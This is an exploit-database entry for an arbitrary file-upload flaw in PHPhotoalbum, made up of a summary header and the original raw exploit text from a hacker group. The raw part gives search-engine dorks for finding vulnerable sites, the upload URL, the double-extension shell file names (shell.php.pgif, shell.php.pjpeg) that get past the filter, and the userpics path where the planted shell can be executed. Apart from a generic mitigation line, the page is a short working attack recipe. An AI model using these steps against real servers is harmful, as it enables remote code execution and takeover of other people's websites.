PHPhotoalbum Exploit

vendor:

PHPhotoalbum

by:

shooq hacker

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: PHPhotoalbum

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

This exploit allows an attacker to upload and execute arbitrary PHP code on the server running PHPhotoalbum. The vulnerability can be found by searching for the dork 'Powered By PHPhotoalbum' or 'inurl:"PHPhotoalbum-upload.php"'. The attacker can upload a shell.php.pgif or shell.php.pjpeg file and access it through a userpics folder. This can lead to remote code execution on the server.

Mitigation:

Update PHPhotoalbum to the latest version or apply patches provided by the vendor. Remove any unnecessary or unused features from the application.

Source

Exploit-DB raw data:

      ||          ||   | ||
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> team wlhaan hacker                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
==========================================================================

~ Script Name : PHPhotoalbum)
~ Language : php
~
~ email: iit@hotmail.com
~
============================================================

Dork : Powered By PHPhotoalbum

or
inurl:"PHPhotoalbum-upload.php"



============================================================
Exploit :



http://{server/script path/upload.php

chang shell

shell.php.pgif
or
shell.php.pjpeg

go to shell

http://server/script path/albums/userpics/shell.php.pgif

============================================================

thank you for

shooq hacker
============================================================

www.sa-hacker.com/vb
============================================================